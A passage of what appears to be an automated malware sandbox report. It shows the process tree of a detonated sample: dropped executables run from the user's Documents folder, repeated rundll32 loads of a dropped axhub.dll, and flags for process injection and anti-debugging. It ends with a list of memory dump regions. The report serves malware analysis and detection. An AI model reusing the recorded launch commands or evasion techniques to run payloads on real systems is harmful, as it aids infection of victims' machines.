                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Fznd5k5NOw9yJq5HxPE7NikV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Fznd5k5NOw9yJq5HxPE7NikV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uuVuWlZZct4Z09pBbGF7Ko1R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\uuVuWlZZct4Z09pBbGF7Ko1R.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\8x9Mftqw9DdccZJHuQa5r0_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\8x9Mftqw9DdccZJHuQa5r0_2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2839330.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2839330.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8332

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/340-314-0x000001E8EFEB0000-0x000001E8EFF21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/340-211-0x000001E8EF760000-0x000001E8EF7D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1032-223-0x000001DCEFA60000-0x000001DCEFAD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1032-312-0x000001DCF0140000-0x000001DCF01B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1092-309-0x000001D8485F0000-0x000001D848661000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1092-222-0x000001D848570000-0x000001D8485E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1276-226-0x0000020FAD340000-0x0000020FAD3B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1276-323-0x0000020FAD3C0000-0x0000020FAD431000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1344-328-0x000001AFC06B0000-0x000001AFC0721000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1344-208-0x000001AFC0120000-0x000001AFC0191000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1436-224-0x000002AD45140000-0x000002AD451B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1436-315-0x000002AD457B0000-0x000002AD45821000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1900-319-0x0000015957C20000-0x0000015957C91000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1900-225-0x0000015957BA0000-0x0000015957C11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2008-164-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

